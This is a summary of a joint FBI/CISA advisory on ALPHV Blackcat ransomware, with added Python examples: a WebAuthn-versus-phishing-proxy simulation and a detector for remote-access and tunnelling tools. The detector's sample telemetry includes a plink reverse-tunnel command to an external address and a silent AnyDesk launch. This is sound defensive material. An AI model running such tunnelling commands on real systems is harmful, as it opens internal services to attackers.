Brief
Summary
This joint Cybersecurity Advisory (CSA) from the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) updates earlier reporting on the ALPHV Blackcat ransomware-as-a-service (RaaS) operation, whose affiliates have compromised over 1,000 entities worldwide and demanded over $500 million in ransom payments. The advisory lists known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with the operation.
It highlights the social engineering used for initial access: affiliates pose as company IT or help desk staff to obtain employee credentials, then use that access to deploy remote access software and legitimate remote access and tunneling tools. Other TTPs include compromising additional accounts, harvesting credentials from password stores, and running open-source adversary-in-the-middle phishing frameworks that capture multifactor authentication (MFA) codes along with passwords and session cookies.
To mitigate the threat, the advisory recommends securing remote access tools, deploying phishing-resistant multi-factor authentication, identifying and investigating abnormal activity, and training users to recognize social engineering and phishing attempts.
Mitigations
1. Implement application controls to manage and control execution of software, including allowlisting remote access programs.
2. Implement phishing-resistant multi-factor authentication (MFA) using FIDO/WebAuthn or Public Key Infrastructure (PKI)-based authenticators; push- and code-based MFA can be captured and relayed by the open-source frameworks the advisory describes.
3. Identify, detect, and investigate abnormal activity using network monitoring tools.
4. Implement user training on social engineering and phishing attacks.
5. Implement internal mail and messaging monitoring.
6. Install and maintain antivirus software.
7. Validate security controls by exercising, testing, and validating against the MITRE ATT&CK for Enterprise framework.
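The following is an added example, not code from the advisory or from CISA/FBI, illustrating why mitigation 2 counters the MFA-capturing frameworks described in the summary: the relying party checks that a WebAuthn assertion was produced for its own origin and rpId, and the signature covers those fields, so a proxy on a look-alike domain cannot relay or rewrite one, whereas a relayed one-time code verifies wherever it was typed. The origin names (example.com, login-example.net), the HMAC stand-in for the authenticator's public-key signature, and the permissive authenticator model are assumptions made so the script runs on the Python standard library.

```python
"""
Added example (not from the advisory): why FIDO/WebAuthn defeats an adversary-in-the-middle
(AiTM) phishing proxy while a relayed TOTP code does not.

A WebAuthn relying party (RP) checks that clientDataJSON.origin is its own origin, that
authenticatorData starts with SHA-256(rpId), and that the authenticator's signature covers
authenticatorData || SHA-256(clientDataJSON). The browser, not the page, writes the origin
and refuses an rpId that is not a registrable suffix of the page's host.

Assumptions: RP_* and PHISH_* names are placeholders; HMAC-SHA256 with a shared key stands in
for the authenticator's public-key signature; the authenticator is modelled as willing to sign
for any rpId (a real one has no credential for the phishing rpId, which stops the flow earlier).
"""
import base64, hashlib, hmac, json, os, struct

RP_ID, RP_ORIGIN = "example.com", "https://example.com"
PHISH_HOST, PHISH_ORIGIN = "login-example.net", "https://login-example.net"
CRED_KEY = os.urandom(32)  # stand-in for the credential's key pair (assumption)


def b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def authenticator_sign(rp_id: str, client_data: bytes) -> dict:
    """authenticatorData = rpIdHash | flags (UP, UV) | signCount; signature covers it and the clientData hash."""
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x05" + (1).to_bytes(4, "big")
    sig = hmac.new(CRED_KEY, auth_data + hashlib.sha256(client_data).digest(), hashlib.sha256).digest()
    return {"clientDataJSON": client_data, "authenticatorData": auth_data, "signature": sig}


def browser_get_assertion(page_origin: str, rp_id: str, challenge: bytes) -> dict:
    """Browser-side rule (simplified): rpId must be the page host or a registrable suffix of it."""
    host = page_origin.split("://", 1)[1].split("/", 1)[0]
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise PermissionError(f"rpId {rp_id!r} is not a registrable suffix of {host!r}")
    client_data = json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                              "origin": page_origin}, separators=(",", ":")).encode()
    return authenticator_sign(rp_id, client_data)


def rp_verify(a: dict, expected_challenge: bytes) -> tuple:
    """The relying party's checks; returns (ok, reason)."""
    cd = json.loads(a["clientDataJSON"])
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch"
    if cd.get("origin") != RP_ORIGIN:
        return False, f"origin mismatch: {cd.get('origin')}"
    ad = a["authenticatorData"]
    if ad[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    expected = hmac.new(CRED_KEY, ad + hashlib.sha256(a["clientDataJSON"]).digest(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, a["signature"]):
        return False, "bad signature"
    return True, "ok"


def aitm_scenarios() -> dict:
    challenge = os.urandom(32)  # issued by the real RP; the proxy relays it unchanged
    out = {"legit": rp_verify(browser_get_assertion(RP_ORIGIN, RP_ID, challenge), challenge)}
    # Proxy page asks the browser for the real rpId: the browser refuses outright.
    try:
        browser_get_assertion(PHISH_ORIGIN, RP_ID, challenge)
    except PermissionError as e:
        out["phish_requests_real_rpid"] = (False, str(e))
    # Proxy page uses its own rpId: the assertion exists but names the wrong origin.
    out["phish_own_rpid"] = rp_verify(browser_get_assertion(PHISH_ORIGIN, PHISH_HOST, challenge), challenge)
    # Proxy rewrites origin and rpIdHash before relaying: the signature no longer matches.
    a = browser_get_assertion(PHISH_ORIGIN, PHISH_HOST, challenge)
    cd = json.loads(a["clientDataJSON"]); cd["origin"] = RP_ORIGIN
    a["clientDataJSON"] = json.dumps(cd, separators=(",", ":")).encode()
    a["authenticatorData"] = hashlib.sha256(RP_ID.encode()).digest() + a["authenticatorData"][32:]
    out["phish_rewrites_fields"] = rp_verify(a, challenge)
    return out


def totp(secret: bytes, t: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1), shown for contrast."""
    mac = hmac.new(secret, struct.pack(">Q", t // step), hashlib.sha1).digest()
    o = mac[-1] & 0x0F
    return str((struct.unpack(">I", mac[o:o + 4])[0] & 0x7FFFFFFF) % 10 ** digits).zfill(digits)


def totp_relay_verifies(secret: bytes, t: int) -> bool:
    """A code typed into the proxy's page is forwarded as-is; nothing binds it to an origin."""
    typed_on_phish_page = totp(secret, t)
    return hmac.compare_digest(typed_on_phish_page, totp(secret, t))


if __name__ == "__main__":
    for name, result in aitm_scenarios().items():
        print(f"{name:28s} {result}")
    print("relayed TOTP accepted:", totp_relay_verifies(b"12345678901234567890", 59))
```

Only the legitimate scenario verifies; the three proxy scenarios fail at the browser, at the origin check, and at the signature check respectively, while the relayed TOTP is accepted, which is the gap mitigation 2 closes.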
Validation
The advisory recommends testing security program performance against the MITRE ATT&CK techniques it maps, at scale and in a production environment, and repeating those tests as controls change rather than treating validation as a one-time exercise.
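As an added example of validating a detection against a technique the advisory describes (not code from the advisory): a scan of process-creation telemetry for remote access and tunnelling tools, with an application-control allowlist modelling mitigation 1 and each alert tagged with its ATT&CK technique so it can be exercised as mitigation 7 and this section recommend. The log format, sample events, host names, watched binaries, allowlist and heuristics are constructed for the example; the advisory names the specific tools affiliates used, and the watchlist should be replaced with those and with whatever your environment actually approves.

```python
"""
Added example (not from the advisory): detection over process-creation telemetry for the
remote-access and tunnelling tools the advisory says affiliates deploy after social engineering.

Assumptions: one JSON object per line with host/user/image/cmdline/parent fields (constructed
format); the watchlist, allowlist, sample events and path heuristics are illustrative.
"""
import json
import ntpath
from dataclasses import dataclass, field
from typing import Optional

# Executables to watch, lower-case basename -> ATT&CK technique (illustrative).
WATCHLIST = {
    "anydesk.exe": "T1219",   # Remote Access Software
    "megasync.exe": "T1219",
    "plink.exe": "T1572",     # Protocol Tunneling
    "ngrok.exe": "T1572",
}
# Application-control allowlist: (host, basename) pairs approved to run a watched tool.
ALLOWLIST = {("IT-JUMP01", "anydesk.exe")}
# Path fragments suggesting a user-writable drop location rather than an installer path.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
# Parents that indicate scripted rather than interactive installation.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample telemetry; 203.0.113.5 is a documentation address.
SAMPLE_LOG = r"""
{"host": "WS-1042", "user": "j.doe", "image": "C:\\Users\\j.doe\\AppData\\Local\\Temp\\AnyDesk.exe", "cmdline": "AnyDesk.exe --silent", "parent": "powershell.exe"}
{"host": "IT-JUMP01", "user": "svc_it", "image": "C:\\Program Files\\AnyDesk\\AnyDesk.exe", "cmdline": "AnyDesk.exe", "parent": "explorer.exe"}
{"host": "WS-1042", "user": "j.doe", "image": "C:\\Users\\j.doe\\Downloads\\plink.exe", "cmdline": "plink.exe -R 3389:127.0.0.1:3389 tunnel@203.0.113.5", "parent": "cmd.exe"}
{"host": "WS-2071", "user": "a.lee", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe", "parent": "explorer.exe"}
{"host": "IT-JUMP01", "user": "svc_it", "image": "C:\\Tools\\ngrok.exe", "cmdline": "ngrok.exe tcp 3389", "parent": "cmd.exe"}
not-json garbage line
"""


@dataclass
class Alert:
    host: str
    user: str
    image: str
    technique: str
    reasons: list = field(default_factory=list)


def _tunnel_reason(basename: str, cmdline: str) -> Optional[str]:
    """Command-line signals specific to the tunnelling tools."""
    args = cmdline.split()
    if basename == "plink.exe" and "-R" in args:
        return "plink remote port forward (-R) exposes a local service to the remote host"
    if basename == "ngrok.exe" and len(args) > 1 and args[1] in {"tcp", "http", "tls", "start"}:
        return f"ngrok {args[1]} tunnel publishes a local port"
    return None


def analyze_event(ev: dict) -> Optional[Alert]:
    """Return an Alert for a watched tool that fails the allowlist or shows suspicious context."""
    image = ev.get("image", "")
    base = ntpath.basename(image).lower()
    if base not in WATCHLIST:
        return None
    reasons = []
    if (ev.get("host"), base) not in ALLOWLIST:
        reasons.append("not on application-control allowlist for this host")
    if any(frag in image.lower().replace("/", "\\") for frag in USER_WRITABLE):
        reasons.append("executed from a user-writable path")
    parent = ntpath.basename(ev.get("parent", "")).lower()
    if parent in SCRIPT_HOSTS:
        reasons.append(f"launched by scripting host {parent}")
    tunnel = _tunnel_reason(base, ev.get("cmdline", ""))
    if tunnel:
        reasons.append(tunnel)
    if not reasons:
        return None  # approved tool, installer path, interactive parent, no tunnel flags
    return Alert(ev.get("host", ""), ev.get("user", ""), image, WATCHLIST[base], reasons)


def scan(lines) -> list:
    """Run analyze_event over raw lines, skipping blank or malformed ones instead of crashing."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = analyze_event(ev)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.splitlines()):
        print(f"[{a.technique}] {a.host} {a.user} {a.image}")
        for r in a.reasons:
            print("    -", r)
```

The approved AnyDesk on the jump host produces no alert, while the same binary dropped into a user's Temp directory by PowerShell, a plink reverse tunnel to an external address, and an ngrok tunnel on a host not approved for it each do; those three events are the test cases to replay when exercising the control against T1219 and T1572.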
